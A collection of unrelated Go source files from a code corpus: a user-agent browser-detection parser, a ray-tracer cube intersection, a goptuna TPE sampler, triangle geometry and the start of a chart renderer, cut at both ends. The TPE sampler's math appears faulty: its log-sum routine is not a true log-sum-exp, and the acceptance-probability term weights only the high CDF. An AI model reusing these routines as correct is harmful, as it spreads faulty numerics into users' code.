`MU`: `MIUI Browser`,
`MS`: `Mobile Silk`,
`MN`: `Minimo`,
`MT`: `Mint Browser`,
`MX`: `Maxthon`,
`MY`: `Mypal`,
`NB`: `Nokia Browser`,
`NO`: `Nokia OSS Browser`,
`NV`: `Nokia Ovi Browser`,
`NX`: `Nox Browser`,
`NE`: `NetSurf`,
`NF`: `NetFront`,
`NL`: `NetFront Life`,
`NP`: `NetPositive`,
`NS`: `Netscape`,
`NT`: `NTENT Browser`,
`OC`: `Oculus Browser`,
`O1`: `Opera Mini iOS`,
`OB`: `Obigo`,
`OD`: `Odyssey Web Browser`,
`OF`: `Off By One`,
`HH`: `OhHai Browser`,
`OE`: `ONE Browser`,
`OX`: `Opera GX`,
`OG`: `Opera Neon`,
`OH`: `Opera Devices`,
`OI`: `Opera Mini`,
`OM`: `Opera Mobile`,
`OP`: `Opera`,
`ON`: `Opera Next`,
`OO`: `Opera Touch`,
`OS`: `Ordissimo`,
`OR`: `Oregano`,
`O0`: `Origin In-Game Overlay`,
`OY`: `Origyn Web Browser`,
`OV`: `Openwave Mobile Browser`,
`OW`: `OmniWeb`,
`OT`: `Otter Browser`,
`PL`: `Palm Blazer`,
`PM`: `Pale Moon`,
`PY`: `Polypane`,
`PP`: `Oppo Browser`,
`PR`: `Palm Pre`,
`PU`: `Puffin`,
`PW`: `Palm WebPro`,
`PA`: `Palmscape`,
`PX`: `Phoenix`,
`PO`: `Polaris`,
`PT`: `Polarity`,
`PS`: `Microsoft Edge`,
`Q1`: `QQ Browser Mini`,
`QQ`: `QQ Browser`,
`QT`: `Qutebrowser`,
`QZ`: `QupZilla`,
`QM`: `Qwant Mobile`,
`QW`: `QtWebEngine`,
`RE`: `Realme Browser`,
`RK`: `Rekonq`,
`RM`: `RockMelt`,
`SB`: `Samsung Browser`,
`SA`: `Sailfish Browser`,
`SC`: `SEMC-Browser`,
`SE`: `Sogou Explorer`,
`SF`: `Safari`,
`S5`: `Safe Exam Browser`,
`SW`: `SalamWeb`,
`SH`: `Shiira`,
`S1`: `SimpleBrowser`,
`SY`: `Sizzy`,
`SK`: `Skyfire`,
`SS`: `Seraphic Sraf`,
`SL`: `Sleipnir`,
`SN`: `Snowshoe`,
`SO`: `Sogou Mobile Browser`,
`S2`: `Splash`,
`SI`: `Sputnik Browser`,
`SR`: `Sunrise`,
`SP`: `SuperBird`,
`SU`: `Super Fast Browser`,
`S3`: `surf`,
`S0`: `START Internet Browser`,
`S4`: `Steam In-Game Overlay`,
`ST`: `Streamy`,
`SX`: `Swiftfox`,
`SZ`: `Seznam Browser`,
`TO`: `t-online.de Browser`,
`TA`: `Tao Browser`,
`TF`: `TenFourFox`,
`TB`: `Tenta Browser`,
`TZ`: `Tizen Browser`,
`TU`: `Tungsten`,
`TG`: `ToGate`,
`TS`: `TweakStyle`,
`TV`: `TV Bro`,
`UB`: `UBrowser`,
`UC`: `UC Browser`,
`UM`: `UC Browser Mini`,
`UT`: `UC Browser Turbo`,
`UZ`: `Uzbl`,
`VI`: `Vivaldi`,
`VV`: `vivo Browser`,
`VB`: `Vision Mobile Browser`,
`VM`: `VMware AirWatch`,
`WI`: `Wear Internet Browser`,
`WP`: `Web Explorer`,
`WE`: `WebPositive`,
`WF`: `Waterfox`,
`WH`: `Whale Browser`,
`WO`: `wOSBrowser`,
`WT`: `WeTab Browser`,
`YJ`: `Yahoo! Japan Browser`,
`YA`: `Yandex Browser`,
`YL`: `Yandex Browser Lite`,
`XI`: `Xiino`,
`XV`: `Xvast`,
// detected browsers in older versions
// `IA` : `Iceape`, : pim
// `SM` : `SeaMonkey`, : pim
}
// Browser families mapped to the short codes of the associated browsers
var browserFamilies = map[string][]string{
`Android Browser`: []string{`AN`, `MU`},
`BlackBerry Browser`: []string{`BB`},
`Baidu`: []string{`BD`, `BS`},
`Amiga`: []string{`AV`, `AW`},
`Chrome`: []string{`CH`, `BA`, `BR`, `CC`, `CD`, `CM`, `CI`, `CF`, `CN`, `CR`, `CP`, `DD`, `IR`, `RM`, `AO`, `TS`, `VI`, `PT`, `AS`, `TB`, `AD`, `SB`, `WP`, `I3`, `CV`, `WH`, `SZ`, `QW`, `LF`, `KW`, `2B`, `CE`, `EC`, `MT`, `MS`, `HA`, `OC`, `MZ`, `BM`, `KN`, `SW`, `M1`, `FA`, `TA`, `AH`, `CL`, `SU`, `EU`, `UB`, `LO`, `VG`, `TV`, `A0`, `1B`, `S4`, `EE`, `AE`, `VM`, `O0`, `TG`, `GB`, `SY`, `HH`, `YJ`, `LL`, `TU`, `XV`, `C2`},
`Firefox`: []string{`FF`, `FE`, `FM`, `SX`, `FB`, `PX`, `MB`, `EI`, `WF`, `CU`, `TF`, `QM`, `FR`, `I4`, `GZ`, `MO`, `F1`, `BI`, `MN`, `BH`, `TO`, `OS`, `MY`, `FY`, `AX`, `C0`, `LH`, `S5`},
`Internet Explorer`: []string{`IE`, `IM`, `PS`},
`Konqueror`: []string{`KO`},
`NetFront`: []string{`NF`},
`NetSurf`: []string{`NE`},
`Nokia Browser`: []string{`NB`, `NO`, `NV`, `DO`},
`Opera`: []string{`OP`, `OM`, `OI`, `ON`, `OO`, `OG`, `OH`, `O1`, `OX`},
`Safari`: []string{`SF`, `MF`, `SO`},
`Sailfish Browser`: []string{`SA`},
}
// Browsers that are available for mobile devices only
var mobileOnlyBrowsers = []string{
`36`, `OC`, `PU`, `SK`, `MF`, `OI`, `OM`, `DD`, `DB`, `ST`, `BL`, `IV`, `FM`, `C1`, `AL`, `SA`, `SB`, `FR`, `WP`, `HA`, `NX`, `HU`, `VV`, `RE`, `CB`, `MZ`, `UM`, `FK`, `FX`, `WI`, `MN`, `M1`, `AH`, `SU`, `EU`, `EZ`, `UT`, `DT`, `S0`,
}
func GetBrowserFamily(browserLabel string) (string, bool) {
for k, vs := range browserFamilies {
for _, v := range vs {
if v == browserLabel {
return k, true
}
}
}
return "", false
}
// Returns if the given browser is mobile only
func IsMobileOnlyBrowser(browser string) bool {
if ArrayContainsString(mobileOnlyBrowsers, browser) {
return true
}
if v, ok := availableBrowsers[browser]; ok {
return ArrayContainsString(mobileOnlyBrowsers, v)
}
return false
}
type BrowserMatchResult = ClientMatchResult
type Engine struct {
Default string `yaml:"default" json:"default"`
Versions map[string]string `yaml:"versions" json:"versions"`
}
type BrowserItem struct {
Regular `yaml:",inline" json:",inline"`
Name string `yaml:"name" json:"name"`
Version string `yaml:"version" json:"version"`
Engine *Engine `yaml:"engine" json:"engine"`
}
// Client parser for browser detection
type Browser struct {
Regexes []*BrowserItem
engine BrowserEngine
verCache map[string]*Version
}
const ParserNameBrowser = `browser`
const FixtureFileBrowser = `browsers.yml`
func init() {
RegClientParser(ParserNameBrowser,
func(dir string) ClientParser {
return NewBrowser(filepath.Join(dir, FixtureFileBrowser))
})
}
func NewBrowser(fileName string) *Browser {
b := &Browser{}
b.engine.ParserName = ParserNameBrowserEngine
if err := b.Load(fileName); err != nil {
return nil
}
return b
}
func (b *Browser) Load(file string) error {
b.verCache = make(map[string]*Version)
var v []*BrowserItem
err := ReadYamlFile(file, &v)
if err != nil {
return err
}
engineFile := file[0:len(file)-len(FixtureFileBrowser)] + FixtureFileBrowserEngine
err = b.engine.Load(engineFile)
if err != nil {
return err
}
b.Regexes = v
return nil
}
func (b *Browser) PreMatch(ua string) bool {
return true
}
func (b *Browser) Parse(ua string) *BrowserMatchResult {
for _, regex := range b.Regexes {
matches := regex.MatchUserAgent(ua)
if len(matches) > 0 {
name := BuildByMatch(regex.Name, matches)
for browserShort, browserName := range availableBrowsers {
if StringEqualIgnoreCase(name, browserName) {
version := BuildVersion(regex.Version, matches)
engine := b.BuildEngine(regex.Engine, version, ua)
engineVersion := b.BuildEngineVersion(engine, ua)
return &BrowserMatchResult{
Type: ParserNameBrowser,
Name: browserName,
ShortName: browserShort,
Version: version,
Engine: engine,
EngineVersion: engineVersion,
}
}
}
}
}
return nil
}
func (b *Browser) BuildEngine(engineData *Engine, browserVersion, ua string) string {
engine := ""
if engineData != nil {
engine = engineData.Default
for version, versionEngine := range engineData.Versions {
if gover.CompareSimple(browserVersion, version) >= 0 {
engine = versionEngine
}
}
}
if engine == "" {
if engineResult := b.engine.Parse(ua); engineResult != nil {
engine = engineResult.Name
}
}
return engine
}
func (b *Browser) BuildEngineVersion(engine, ua string) string {
if engine == "" {
return ""
}
v, ok := b.verCache[engine]
if !ok {
v = &Version{Engine: engine}
v.Compile()
b.verCache[engine] = v
}
return v.Parse(ua)
} | parser/client/browser.go | 0.602412 | 0.671821 | browser.go | starcoder |
package ray
import "math"
// Cube is a canonical cube, centered of origin, of side 2 (-1 to +1)
type Cube struct {
Transform
Surface
name string
}
// NewCube instantiate a new cube
func NewCube() *Cube {
return &Cube{
Transform: IDTransform,
Surface: DefaultSurface,
}
}
// SetName ...
func (c *Cube) SetName(name string) {
c.name = "cube:" + name
}
// Name returns the Cube's name
func (c *Cube) Name() string {
return c.name
}
func (c *Cube) Surf() *Surface {
return &c.Surface
}
// Translate applies a translation to the cube
func (c *Cube) Translate(x, y, z float64) *Cube {
c.Transform.Translate(x, y, z)
return c
}
// RotateX applies a rotation around x-axis to the Cube
func (c *Cube) RotateX(x float64) *Cube {
c.Transform.RotateX(x)
return c
}
// RotateY applies a rotation around y-axis to the Cube
func (c *Cube) RotateY(y float64) *Cube {
c.Transform.RotateY(y)
return c
}
// RotateZ applies a rotation around z-axis to the Cube
func (c *Cube) RotateZ(z float64) *Cube {
c.Transform.RotateZ(z)
return c
}
// Scale applies a scaling transform to the Cube
func (c *Cube) Scale(x, y, z float64) *Cube {
c.Transform.Scale(x, y, z)
return c
}
// Intersect ...
func (c *Cube) Intersect(r Ray) *Hit {
var x, y, z, t float64
locRay := c.RayToLocal(r)
localDir := locRay.dir
localPoint := locRay.pt
minT := math.MaxFloat64
var h Hit
h.globRay = r
h.locRay = locRay
// inters y = -1 et y = 1
if !isNul(localDir[Y]) {
// y = -1
t = (-1 - localPoint[Y]) / localDir[Y]
if t > Epsilon {
x = localPoint[X] + t*localDir[X]
if (x > -1-Epsilon) && (x < 1-Epsilon) {
z = localPoint[Z] + t*localDir[Z]
if (z > -1-Epsilon) && (z < 1-Epsilon) {
minT = t
h.locNorm.pt = Point3{x, -1, z}
h.locNorm.dir = Vector3{0, -1, 0}
}
}
}
// y =1
t = (1 - localPoint[Y]) / localDir[Y]
if (t > Epsilon) && (t < minT) {
x = localPoint[X] + t*localDir[X]
if (x > -1+Epsilon) && (x < 1+Epsilon) {
z = localPoint[Z] + t*localDir[Z]
if (z > -1+Epsilon) && (z < 1+Epsilon) {
minT = t
h.locNorm.pt = Point3{x, 1, z}
h.locNorm.dir = Vector3{0, 1, 0}
}
}
}
}
// inters x = -1 et x = 1
if !isNul(localDir[X]) {
// x = -1
t = (-1 - localPoint[X]) / localDir[X]
if (t > Epsilon) && (t < minT) {
y = localPoint[Y] + t*localDir[Y]
if (y > -1+Epsilon) && (y < 1+Epsilon) {
z = localPoint[Z] + t*localDir[Z]
if (z > -1+Epsilon) && (z < 1+Epsilon) {
minT = t
h.locNorm.pt = Point3{-1, y, z}
h.locNorm.dir = Vector3{-1, 0, 0}
}
}
}
// x = 1
t = (1 - localPoint[X]) / localDir[X]
if (t > Epsilon) && (t < minT) {
y = localPoint[Y] + t*localDir[Y]
if (y > -1-Epsilon) && (y < 1-Epsilon) {
z = localPoint[Z] + t*localDir[Z]
if (z > -1-Epsilon) && (z < 1-Epsilon) {
minT = t
h.locNorm.pt = Point3{1, y, z}
h.locNorm.dir = Vector3{1, 0, 0}
}
}
}
}
// inters z = -1 et z = 1
if !isNul(localDir[Z]) {
// z = -1
t = (-1 - localPoint[Z]) / localDir[Z]
if (t > Epsilon) && (t < minT) {
y = localPoint[Y] + t*localDir[Y]
if (y > -1+Epsilon) && (y < 1+Epsilon) {
x = localPoint[X] + t*localDir[X]
if (x > -1-Epsilon) && (x < 1-Epsilon) {
minT = t
h.locNorm.pt = Point3{x, y, -1}
h.locNorm.dir = Vector3{0, 0, -1}
}
}
}
// z = 1
t = (1 - localPoint[Z]) / localDir[Z]
if (t > Epsilon) && (t < minT) {
y = localPoint[Y] + t*localDir[Y]
if (y > -1-Epsilon) && (y < 1-Epsilon) {
x = localPoint[X] + t*localDir[X]
if (x > -1+Epsilon) && (x < 1+Epsilon) {
minT = t
h.locNorm.pt = Point3{x, y, 1}
h.locNorm.dir = Vector3{0, 0, 1}
}
}
}
}
if minT < math.MaxFloat64-Epsilon {
h.globNorm = c.RayToGlobal(h.locNorm)
h.globNorm.Normalize()
h.Surface = &c.Surface
return &h
}
return nil
}
func (c *Cube) MinMax() (Point3, Point3) {
return Point3{-1, -1, -1}, Point3{1, 1, 1}
} | cube.go | 0.821939 | 0.488344 | cube.go | starcoder |
package tpe
import (
"math"
"math/rand"
"sort"
"sync"
"github.com/c-bata/goptuna"
"github.com/c-bata/goptuna/internal/random"
"gonum.org/v1/gonum/floats"
)
const eps = 1e-12
// FuncGamma is a type of gamma function.
type FuncGamma func(int) int
// FuncWeights is a type of weights function.
type FuncWeights func(int) []float64
// DefaultGamma is a default gamma function.
func DefaultGamma(x int) int {
a := int(math.Ceil(0.1 * float64(x)))
if a > 25 {
return 25
}
return a
}
// HyperoptDefaultGamma is a default gamma function of Hyperopt.
func HyperoptDefaultGamma(x int) int {
a := int(math.Ceil(0.25 * float64(x)))
if a > 25 {
return a
}
return 25
}
// DefaultWeights is a default weights function.
func DefaultWeights(x int) []float64 {
if x == 0 {
return []float64{}
} else if x < 25 {
return ones1d(x)
} else {
ramp := linspace(1.0/float64(x), 1.0, x-25, true)
flat := ones1d(25)
return append(ramp, flat...)
}
}
var _ goptuna.Sampler = &Sampler{}
// Sampler returns the next search points by using TPE.
type Sampler struct {
numberOfStartupTrials int
numberOfEICandidates int
gamma FuncGamma
params ParzenEstimatorParams
rng *rand.Rand
randomSampler *goptuna.RandomSampler
mu sync.Mutex
}
// NewSampler returns the TPE sampler.
func NewSampler(opts ...SamplerOption) *Sampler {
sampler := &Sampler{
numberOfStartupTrials: 10,
numberOfEICandidates: 24,
gamma: DefaultGamma,
params: ParzenEstimatorParams{
ConsiderPrior: true,
PriorWeight: 1.0,
ConsiderMagicClip: true,
ConsiderEndpoints: false,
Weights: DefaultWeights,
},
rng: rand.New(rand.NewSource(0)),
randomSampler: goptuna.NewRandomSampler(),
}
for _, opt := range opts {
opt(sampler)
}
return sampler
}
func (s *Sampler) splitObservationPairs(
configVals []float64,
lossVals [][2]float64,
) ([]float64, []float64) {
nbelow := s.gamma(len(configVals))
lossAscending := argSort2d(lossVals)
sort.Ints(lossAscending[:nbelow])
below := choice(configVals, lossAscending[:nbelow])
sort.Ints(lossAscending[nbelow:])
above := choice(configVals, lossAscending[nbelow:])
return below, above
}
func (s *Sampler) sampleFromGMM(parzenEstimator *ParzenEstimator, low, high float64, size int, q float64, isLog bool) []float64 {
weights := parzenEstimator.Weights
mus := parzenEstimator.Mus
sigmas := parzenEstimator.Sigmas
nsamples := size
if low > high {
panic("the low should be lower than the high")
}
samples := make([]float64, 0, nsamples)
for {
if len(samples) == nsamples {
break
}
active, err := random.ArgMaxMultinomial(weights)
if err != nil {
panic(err)
}
x := s.rng.NormFloat64()
draw := x*sigmas[active] + mus[active]
if low <= draw && draw < high {
samples = append(samples, draw)
}
}
if isLog {
for i := range samples {
samples[i] = math.Exp(samples[i])
}
}
if q > 0 {
for i := range samples {
samples[i] = math.Round(samples[i]/q) * q
}
}
return samples
}
func (s *Sampler) normalCDF(x float64, mu []float64, sigma []float64) []float64 {
l := len(mu)
results := make([]float64, l)
for i := 0; i < l; i++ {
denominator := x - mu[i]
numerator := math.Max(math.Sqrt(2)*sigma[i], eps)
z := denominator / numerator
results[i] = 0.5 * (1 + math.Erf(z))
}
return results
}
func (s *Sampler) logNormalCDF(x float64, mu []float64, sigma []float64) []float64 {
if x < 0 {
panic("negative argument is given to logNormalCDF")
}
l := len(mu)
results := make([]float64, l)
for i := 0; i < l; i++ {
denominator := math.Log(math.Max(x, eps)) - mu[i]
numerator := math.Max(math.Sqrt(2)*sigma[i], eps)
z := denominator / numerator
results[i] = 0.5 + (0.5 * math.Erf(z))
}
return results
}
func (s *Sampler) logsumRows(x [][]float64) []float64 {
y := make([]float64, len(x))
for i := range x {
m := floats.Max(x[i])
sum := 0.0
for j := range x[i] {
sum += math.Log(math.Exp(x[i][j] - m))
}
y[i] = sum + m
}
return y
}
func (s *Sampler) gmmLogPDF(samples []float64, parzenEstimator *ParzenEstimator, low, high float64, q float64, isLog bool) []float64 {
weights := parzenEstimator.Weights
mus := parzenEstimator.Mus
sigmas := parzenEstimator.Sigmas
if len(samples) == 0 {
return []float64{}
}
highNormalCdf := s.normalCDF(high, mus, sigmas)
lowNormalCdf := s.normalCDF(low, mus, sigmas)
if len(weights) != len(highNormalCdf) {
panic("the length should be the same with weights")
}
paccept := 0.0
for i := 0; i < len(highNormalCdf); i++ {
paccept += highNormalCdf[i]*weights[i] - lowNormalCdf[i]
}
if q > 0 {
probabilities := make([]float64, len(samples))
if len(weights) != len(mus) || len(weights) != len(sigmas) {
panic("should be the same length of weights, mus and sigmas")
}
for i := range weights {
w := weights[i]
mu := mus[i]
sigma := sigmas[i]
upperBound := make([]float64, len(samples))
lowerBound := make([]float64, len(samples))
for i := range upperBound {
if isLog {
upperBound[i] = math.Min(samples[i]+q/2.0, math.Exp(high))
lowerBound[i] = math.Max(samples[i]-q/2.0, math.Exp(low))
lowerBound[i] = math.Max(0, lowerBound[i])
} else {
upperBound[i] = math.Min(samples[i]+q/2.0, high)
lowerBound[i] = math.Max(samples[i]-q/2.0, low)
}
}
incAmt := make([]float64, len(samples))
for j := range upperBound {
if isLog {
incAmt[j] = w * s.logNormalCDF(upperBound[j], []float64{mu}, []float64{sigma})[0]
incAmt[j] -= w * s.logNormalCDF(lowerBound[j], []float64{mu}, []float64{sigma})[0]
} else {
incAmt[j] = w * s.normalCDF(upperBound[j], []float64{mu}, []float64{sigma})[0]
incAmt[j] -= w * s.normalCDF(lowerBound[j], []float64{mu}, []float64{sigma})[0]
}
}
for j := range probabilities {
probabilities[j] += incAmt[j]
}
}
returnValue := make([]float64, len(samples))
for i := range probabilities {
returnValue[i] = math.Log(probabilities[i]+eps) + math.Log(paccept+eps)
}
return returnValue
}
var (
jacobian []float64
distance [][]float64
)
if isLog {
jacobian = samples
} else {
jacobian = ones1d(len(samples))
}
distance = make([][]float64, len(samples))
for i := range samples {
distance[i] = make([]float64, len(mus))
for j := range mus {
if isLog {
distance[i][j] = math.Log(samples[i]) - mus[j]
} else {
distance[i][j] = samples[i] - mus[j]
}
}
}
mahalanobis := make([][]float64, len(distance))
for i := range distance {
mahalanobis[i] = make([]float64, len(distance[i]))
for j := range distance[i] {
mahalanobis[i][j] = distance[i][j] / math.Pow(math.Max(sigmas[j], eps), 2)
}
}
z := make([][]float64, len(distance))
for i := range distance {
z[i] = make([]float64, len(distance[i]))
for j := range distance[i] {
z[i][j] = math.Sqrt(2*math.Pi) * sigmas[j] * jacobian[i]
}
}
coefficient := make([][]float64, len(distance))
for i := range distance {
coefficient[i] = make([]float64, len(distance[i]))
for j := range distance[i] {
coefficient[i][j] = weights[j] / z[i][j] / paccept
}
}
y := make([][]float64, len(distance))
for i := range distance {
y[i] = make([]float64, len(distance[i]))
for j := range distance[i] {
y[i][j] = -0.5*mahalanobis[i][j] + math.Log(coefficient[i][j])
}
}
return s.logsumRows(y)
}
func (s *Sampler) sampleFromCategoricalDist(probabilities []float64, size int) []int {
if size == 0 {
return []int{}
}
sample := random.Multinomial(1, probabilities, size)
returnVals := make([]int, size)
for i := 0; i < size; i++ {
for j := range sample[i] {
returnVals[i] += sample[i][j] * j
}
}
return returnVals
}
func (s *Sampler) categoricalLogPDF(sample []int, p []float64) []float64 {
if len(sample) == 0 {
return []float64{}
}
result := make([]float64, len(sample))
for i := 0; i < len(sample); i++ {
result[i] = math.Log(p[sample[i]])
}
return result
}
func (s *Sampler) compare(samples []float64, logL []float64, logG []float64) []float64 {
if len(samples) == 0 {
return []float64{}
}
if len(logL) != len(logG) {
panic("the size of the log_l and log_g should be same")
}
score := make([]float64, len(logL))
for i := range score {
score[i] = logL[i] - logG[i]
}
if len(samples) != len(score) {
panic("the size of the samples and score should be same")
}
argMax := func(s []float64) int {
max := s[0]
maxIdx := 0
for i := range s {
if i == 0 {
continue
}
if s[i] > max {
max = s[i]
maxIdx = i
}
}
return maxIdx
}
best := argMax(score)
results := make([]float64, len(samples))
for i := range results {
results[i] = samples[best]
}
return results
}
func (s *Sampler) sampleNumerical(low, high float64, below, above []float64, q float64, isLog bool) float64 {
if isLog {
low = math.Log(low)
high = math.Log(high)
for i := range below {
below[i] = math.Log(below[i])
}
for i := range above {
above[i] = math.Log(above[i])
}
}
size := s.numberOfEICandidates
parzenEstimatorBelow := NewParzenEstimator(below, low, high, s.params)
sampleBelow := s.sampleFromGMM(parzenEstimatorBelow, low, high, size, q, isLog)
logLikelihoodsBelow := s.gmmLogPDF(sampleBelow, parzenEstimatorBelow, low, high, q, isLog)
parzenEstimatorAbove := NewParzenEstimator(above, low, high, s.params)
logLikelihoodsAbove := s.gmmLogPDF(sampleBelow, parzenEstimatorAbove, low, high, q, isLog)
return s.compare(sampleBelow, logLikelihoodsBelow, logLikelihoodsAbove)[0]
}
func (s *Sampler) sampleUniform(distribution goptuna.UniformDistribution, below, above []float64) float64 {
low := distribution.Low
high := distribution.High
return s.sampleNumerical(low, high, below, above, 0, false)
}
func (s *Sampler) sampleLogUniform(distribution goptuna.LogUniformDistribution, below, above []float64) float64 {
low := distribution.Low
high := distribution.High
return s.sampleNumerical(low, high, below, above, 0, true)
}
func (s *Sampler) sampleInt(distribution goptuna.IntUniformDistribution, below, above []float64) float64 {
q := 1.0
low := float64(distribution.Low) - 0.5*q
high := float64(distribution.High) + 0.5*q
return s.sampleNumerical(low, high, below, above, q, false)
}
func (s *Sampler) sampleStepInt(distribution goptuna.StepIntUniformDistribution, below, above []float64) float64 {
q := 1.0
low := float64(distribution.Low) - 0.5*q
high := float64(distribution.High) + 0.5*q
return s.sampleNumerical(low, high, below, above, q, false)
}
func (s *Sampler) sampleDiscreteUniform(distribution goptuna.DiscreteUniformDistribution, below, above []float64) float64 {
q := distribution.Q
r := distribution.High - distribution.Low
// [low, high] is shifted to [0, r] to align sampled values at regular intervals.
// See https://github.com/optuna/optuna/pull/917#issuecomment-586114630 for details.
low := 0 - 0.5*q
high := r + 0.5*q
// Shift below and above to [0, r]
for i := range below {
below[i] -= distribution.Low
}
for i := range above {
above[i] -= distribution.Low
}
best := s.sampleNumerical(low, high, below, above, q, false) + distribution.Low
return math.Min(math.Max(best, distribution.Low), distribution.High)
}
func (s *Sampler) sampleCategorical(distribution goptuna.CategoricalDistribution, below, above []float64) float64 {
belowInt := make([]int, len(below))
for i := range below {
belowInt[i] = int(below[i])
}
aboveInt := make([]int, len(above))
for i := range above {
aboveInt[i] = int(above[i])
}
upper := len(distribution.Choices)
size := s.numberOfEICandidates
if s.numberOfEICandidates >= len(distribution.Choices) {
size = len(distribution.Choices)
}
// below
weightsBelow := s.params.Weights(len(below))
countsBelow := bincount(belowInt, weightsBelow, upper)
weightedBelowSum := 0.0
weightedBelow := make([]float64, len(countsBelow))
for i := range countsBelow {
weightedBelow[i] = countsBelow[i] + s.params.PriorWeight
weightedBelowSum += weightedBelow[i]
}
for i := range weightedBelow {
weightedBelow[i] /= weightedBelowSum
}
var samples []int
if s.numberOfEICandidates != size {
samples = make([]int, size)
for i := 0; i < size; i++ {
samples[i] = i
}
} else {
samples = s.sampleFromCategoricalDist(weightedBelow, size)
}
logLikelihoodsBelow := s.categoricalLogPDF(samples, weightedBelow)
// above
weightsAbove := s.params.Weights(len(above))
countsAbove := bincount(aboveInt, weightsAbove, upper)
weightedAboveSum := 0.0
weightedAbove := make([]float64, len(countsAbove))
for i := range countsAbove {
weightedAbove[i] = countsAbove[i] + s.params.PriorWeight
weightedAboveSum += weightedAbove[i]
}
for i := range weightedAbove {
weightedAbove[i] /= weightedAboveSum
}
logLikelihoodsAbove := s.categoricalLogPDF(samples, weightedAbove)
floatSamples := make([]float64, size)
for i := range samples {
floatSamples[i] = float64(samples[i])
}
return s.compare(floatSamples, logLikelihoodsBelow, logLikelihoodsAbove)[0]
}
// Sample a parameter for a given distribution.
func (s *Sampler) Sample(
study *goptuna.Study,
trial goptuna.FrozenTrial,
paramName string,
paramDistribution interface{},
) (float64, error) {
s.mu.Lock()
defer s.mu.Unlock()
values, scores, err := getObservationPairs(study, paramName)
if err != nil {
return 0, err
}
n := len(values)
if n < s.numberOfStartupTrials {
return s.randomSampler.Sample(study, trial, paramName, paramDistribution)
}
belowParamValues, aboveParamValues := s.splitObservationPairs(values, scores)
switch d := paramDistribution.(type) {
case goptuna.UniformDistribution:
return s.sampleUniform(d, belowParamValues, aboveParamValues), nil
case goptuna.LogUniformDistribution:
return s.sampleLogUniform(d, belowParamValues, aboveParamValues), nil
case goptuna.IntUniformDistribution:
return s.sampleInt(d, belowParamValues, aboveParamValues), nil
case goptuna.StepIntUniformDistribution:
return s.sampleStepInt(d, belowParamValues, aboveParamValues), nil
case goptuna.DiscreteUniformDistribution:
return s.sampleDiscreteUniform(d, belowParamValues, aboveParamValues), nil
case goptuna.CategoricalDistribution:
return s.sampleCategorical(d, belowParamValues, aboveParamValues), nil
}
return 0, goptuna.ErrUnknownDistribution
}
func getObservationPairs(study *goptuna.Study, paramName string) ([]float64, [][2]float64, error) {
var sign float64 = 1
if study.Direction() == goptuna.StudyDirectionMaximize {
sign = -1
}
trials, err := study.GetTrials()
if err != nil {
return nil, nil, err
}
values := make([]float64, 0, len(trials))
scores := make([][2]float64, 0, len(trials))
for _, trial := range trials {
ir, ok := trial.InternalParams[paramName]
if !ok {
continue
}
var paramValue, score0, score1 float64
paramValue = ir
if trial.State == goptuna.TrialStateComplete {
score0 = math.Inf(-1)
score1 = sign * trial.Value
} else if trial.State == goptuna.TrialStatePruned {
if len(trial.IntermediateValues) > 0 {
var step int
var intermediateValue float64
for key := range trial.IntermediateValues {
if key > step {
step = key
intermediateValue = trial.IntermediateValues[key]
}
}
score0 = float64(-step)
score1 = sign * intermediateValue
} else {
score0 = math.Inf(1)
score1 = 0.0
}
} else {
continue
}
values = append(values, paramValue)
scores = append(scores, [2]float64{score0, score1})
}
return values, scores, nil
} | tpe/sampler.go | 0.696475 | 0.409752 | sampler.go | starcoder |
package geometry
func (triangle *Triangle) GetNormal() Vector {
if Magnitude(triangle.Normal) > 0 {
return triangle.Normal
}
edge1 := CreateVector(triangle.Vertex1, triangle.Vertex0)
edge2 := CreateVector(triangle.Vertex2, triangle.Vertex0)
normal := CrossProduct(edge1, edge2)
return normal
}
func getLinePoint(ray *Ray, d float64) Point {
addPoint := ScalarProduct(ray.Vector, d)
return Point{
ray.Origin[0] + addPoint[0],
ray.Origin[1] + addPoint[1],
ray.Origin[2] + addPoint[2],
}
}
func GetIntersection(ray *Ray, triangle *Triangle) *Point {
epsilon := 0.0000001
normal := triangle.GetNormal()
cos := DotProduct(ray.Vector, normal)
if cos == 0 {
return nil
}
d := DotProduct(CreateVector(triangle.Vertex0, ray.Origin), normal) / cos
if d < epsilon {
return nil // I think this means point is in wrong direction
}
potentialPoint := getLinePoint(ray, d)
var subTriangle *Triangle
subTriangleArea := 0.0
subTriangle = &Triangle{Vertex0: triangle.Vertex0, Vertex1: triangle.Vertex1, Vertex2: potentialPoint}
subTriangleArea += subTriangle.GetArea()
subTriangle.Vertex0 = triangle.Vertex2
subTriangleArea += subTriangle.GetArea()
subTriangle.Vertex1 = triangle.Vertex0
subTriangleArea += subTriangle.GetArea()
if subTriangleArea-triangle.GetArea() < epsilon {
return &potentialPoint
}
return nil
}
func (triangle *Triangle) GetArea() float64 {
edge1 := CreateVector(triangle.Vertex1, triangle.Vertex0)
edge2 := CreateVector(triangle.Vertex2, triangle.Vertex0)
return Magnitude(CrossProduct(edge1, edge2)) / 2.0
}
func TriangulatePolygon(points []Point, normal Vector, vertexNormals []Vector, texture *TextureProperties) []*Triangle {
triangles := make([]*Triangle, len(points)-2)
for i := 0; i < len(points)-2; i++ {
triangle := &Triangle{
Vertex0: points[0],
Vertex1: points[i+1],
Vertex2: points[i+2],
Normal: normal,
VertexNormals: vertexNormals,
DiffuseAlbedo: texture.DiffuseAlbedo,
SpecularAlbedo: texture.SpecularAlbedo,
TranslucenseAlbedo: texture.TranslucenseAlbedo,
MaterialType: texture.MaterialType,
}
triangles[i] = triangle
}
return triangles
}
func GetFaceVertexes(face []int, vertexes []Point) []Point {
points := make([]Point, len(face))
for faceIndex, vertexIndex := range face {
points[faceIndex] = vertexes[vertexIndex]
}
return points
}
func TriangulateObject(object *Object) []*Triangle {
var triangles []*Triangle
for i, face := range object.Faces {
var vertexNormals []Vector
points := GetFaceVertexes(face, object.Vertexes)
texture := object.Textures[object.TextureMap[i]]
if len(object.VertexNormals) > 0 {
vertexNormals = make([]Vector, len(points))
for p := 0; p < len(points); p++ {
vertexNormals[p] = Normalize(object.VertexNormals[face[p]])
}
}
normal := Normalize(object.Normals[i])
triangles = append(
triangles,
TriangulatePolygon(points, normal, vertexNormals, &texture)...,
)
}
return triangles
} | pkg/geometry/triangle.go | 0.829492 | 0.808332 | triangle.go | starcoder |
package chart
import (
"image"
"image/png"
"io"
"math"
"github.com/golang/freetype/truetype"
"github.com/liuxhu/go-chart/v2/drawing"
)
// PNG returns a new png/raster renderer.
func PNG(width, height int) (Renderer, error) {
i := image.NewRGBA(image.Rect(0, 0, width, height))
gc, err := drawing.NewRasterGraphicContext(i)
if err == nil {
return &rasterRenderer{
